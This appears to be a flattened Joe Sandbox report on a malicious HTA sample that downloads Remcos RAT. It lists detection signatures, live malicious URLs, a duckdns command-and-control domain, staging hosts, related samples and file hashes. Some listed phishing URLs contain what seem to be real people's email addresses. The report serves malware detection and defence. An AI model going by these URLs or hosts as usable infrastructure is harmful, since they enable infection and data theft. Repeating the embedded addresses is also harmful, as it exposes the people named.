rmcnewprojectadd.duckdns.org 192.169.69.26, 14645, 49765, 49793 WOWUS United States 36->56 76 Contains functionality to bypass UAC (CMSTPLUA) 36->76 78 Detected Remcos RAT 36->78 80 Contains functionalty to change the wallpaper 36->80 82 4 other signatures 36->82 signatures20

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    nicegirlforyou.hta26%ReversingLabsScript-WScript.Trojan.Asthma
                    nicegirlforyou.hta29%VirustotalBrowse
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://172.245.142.60/551/sheism0%Avira URL Cloudsafe
                    http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF100%Avira URL Cloudmalware
                    http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF40%Avira URL Cloudsafe
                    rmcnewprojectadd.duckdns.org100%Avira URL Cloudmalware
                    http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFl0%Avira URL Cloudsafe
                    http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFC:0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    rmcnewprojectadd.duckdns.org
                    192.169.69.26
                    truetrue
                      unknown
                      paste.ee
                      104.21.84.67
                      truefalse
                        high
                        cloudinary.map.fastly.net
                        151.101.1.137
                        truefalse
                          high
                          res.cloudinary.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFtrue
                            • Avira URL Cloud: malware
                            unknown
                            rmcnewprojectadd.duckdns.orgtrue
                            • Avira URL Cloud: malware
                            unknown
                            https://paste.ee/r/03xCn/0false
                              high
                              https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF4powershell.exe, 00000003.00000002.2206466592.0000000007FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2203877007.0000000005BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://172.245.142.60/551/sheismpowershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFlpowershell.exe, 00000003.00000002.2206466592.0000000007FE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFC:powershell.exe, 00000003.00000002.2206466592.000000000801E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://contoso.com/Licensepowershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com;powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://analytics.paste.eepowershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://go.microspowershell.exe, 00000003.00000002.2201944807.000000000513E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://geoplugin.net/json.gpCasPol.exefalse
                                                        high
                                                        https://www.google.compowershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://res.cloudinary.compowershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgtpowershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2201944807.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000004A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2203877007.0000000005BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://analytics.paste.ee;powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdnjs.cloudflare.compowershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdnjs.cloudflare.com;powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2201944807.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000004A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://secure.gravatar.compowershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://themes.googleusercontent.compowershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    151.101.1.137
                                                                                    cloudinary.map.fastly.netUnited States
                                                                                    54113FASTLYUSfalse
                                                                                    172.245.142.60
                                                                                    unknownUnited States
                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                    104.21.84.67
                                                                                    paste.eeUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    192.169.69.26
                                                                                    rmcnewprojectadd.duckdns.orgUnited States
                                                                                    23033WOWUStrue
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1572998
                                                                                    Start date and time:2024-12-11 11:22:07 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 10s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:13
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:nicegirlforyou.hta
                                                                                    Detection:MAL
                                                                                    Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@6/4
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 58
                                                                                    • Number of non-executed functions: 183
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .hta
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target mshta.exe, PID 3512 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    TimeTypeDescription
                                                                                    05:22:56API Interceptor121x Sleep call for process: powershell.exe modified
                                                                                    05:24:06API Interceptor3812161x Sleep call for process: CasPol.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    151.101.1.137Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                      Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                          16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                                            #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                                              nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                  http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                                                    https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                                                      https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174dGet hashmaliciousUnknownBrowse
                                                                                                        172.245.142.60NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 172.245.142.60/551/wcb/nicegirlforyou.hta
                                                                                                        matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF
                                                                                                        Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                                        104.21.84.67Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                                        • paste.ee/d/GXRLA
                                                                                                        nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                        • paste.ee/d/81FCf
                                                                                                        Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • paste.ee/d/MQJcS
                                                                                                        Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                        • paste.ee/d/u4bvR
                                                                                                        rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                                                                                        • paste.ee/d/SDfNF
                                                                                                        Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/enGXm
                                                                                                        Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/wXm0Y
                                                                                                        SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/eA3FM
                                                                                                        dereac.vbeGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/JZHbW
                                                                                                        P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/kmRFs
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        rmcnewprojectadd.duckdns.orgmatchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 192.3.101.9
                                                                                                        cloudinary.map.fastly.netinvoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 151.101.65.137
                                                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.1.137
                                                                                                        Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                        • 151.101.129.137
                                                                                                        PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                        • 151.101.129.137
                                                                                                        New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 151.101.193.137
                                                                                                        NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.65.137
                                                                                                        Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.65.137
                                                                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 151.101.1.137
                                                                                                        xxx.docGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.1.137
                                                                                                        Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.137
                                                                                                        paste.eenicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 188.114.97.6
                                                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.6
                                                                                                        PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.6
                                                                                                        matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 104.21.84.67
                                                                                                        Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 188.114.96.6
                                                                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 172.67.187.200
                                                                                                        ithgreat.docGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.6
                                                                                                        xxx.docGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.96.6
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        FASTLYUSinvoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 151.101.65.137
                                                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.1.137
                                                                                                        Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                        • 151.101.129.137
                                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 151.101.1.108
                                                                                                        https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://vcsfi.kidsavancados.com/Get hashmaliciousCaptcha PhishBrowse
                                                                                                        • 151.101.66.137
                                                                                                        WOWUS1733858044e64c59622ab494dda2ff98fce76991f7e15e513d6a3620e7f58ad7cc67d3889c571.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                        • 192.169.69.26
                                                                                                        f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                        • 192.169.69.26
                                                                                                        P0J8k3LhVV.exeGet hashmaliciousNanocoreBrowse
                                                                                                        • 192.169.69.26
                                                                                                        173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 192.169.69.26
                                                                                                        173349048648c854fdb460c6c7c5fd91e325ea882961d8aa5918c705b053bb8e9350ae27c8877.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 192.169.69.26
                                                                                                        17334905521d597933f8aaddb97573b46d117b288a865f8a218fac0e15588edac3edcab35b588.dat-decoded.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                        • 192.169.69.26
                                                                                                        17334905555b1bb5616b6229d3e91468cd944baaeea0d1c904cc91a0fe89b683d653c3710f732.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                        • 192.169.69.26
                                                                                                        17334792691d3587abc182d697c2a82dd4ad88afaea9fc5290ea9e42c7eec649b5ab319fda603.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 192.169.69.26
                                                                                                        mgtOKjHZ1s.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        clfCnDEDd1.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 192.169.69.26
                                                                                                        AS-COLOCROSSINGUSnicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 192.3.101.149
                                                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 192.3.101.149
                                                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • 107.172.44.175
                                                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 23.95.235.29
                                                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • 107.172.44.175
                                                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • 107.172.44.175
                                                                                                        Josho.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 104.170.167.20
                                                                                                        hax.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 107.172.219.218
                                                                                                        ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                        • 192.3.220.6
                                                                                                        NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 172.245.142.60
                                                                                                        CLOUDFLARENETUSnicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                        • 188.114.96.6
                                                                                                        Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 104.21.86.72
                                                                                                        EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 104.21.78.149
                                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.18.41.169
                                                                                                        https://renemattner.simvoly.com/?preview=__PREVIEW_ONLY&c=E,1,Ks6Sg62CfOE_CkRSGsjWzEZqQJ4kslHIx5N9ygK8IrTT7dwyHfXwvE4VbQEnQwQXPVvQMpZGcaIV_fVQbP7vMcdrXBRSSDaH5Z18aBsWUw,,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.18.95.41
                                                                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 172.64.41.3
                                                                                                        https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
                                                                                                        • 104.21.37.221
                                                                                                        https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
                                                                                                        • 172.67.213.233
                                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0enicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        QUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.84.67
                                                                                                        • 151.101.1.137
                                                                                                        No context
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3203), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):153952
                                                                                                        Entropy (8bit):3.8067197460998417
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:HJlofF4RJFAiJlofF4RJFNiJlofF4RJFl:HJlofeRJFAiJlofeRJFNiJlofeRJFl
                                                                                                        MD5:5CE00A79A9F41D260446BFDCC6267ADF
                                                                                                        SHA1:0B2B90BEB56C59916B98004B1444698538729822
                                                                                                        SHA-256:EFAB5D21ED82F610BC5F1734B909A7E5C3A6C2ECEBB276DD03B4D5BAF8E9B058
                                                                                                        SHA-512:D4DE7FE61F23CE7524ED3123319AC93F33AE1806BD426045CA9DF1FA9EE82CCA58AA314711BBDE6A6FFA2EEE98DC20CC5E4D80D2EC7ABB028BE0639944714FEE
                                                                                                        Malicious:false
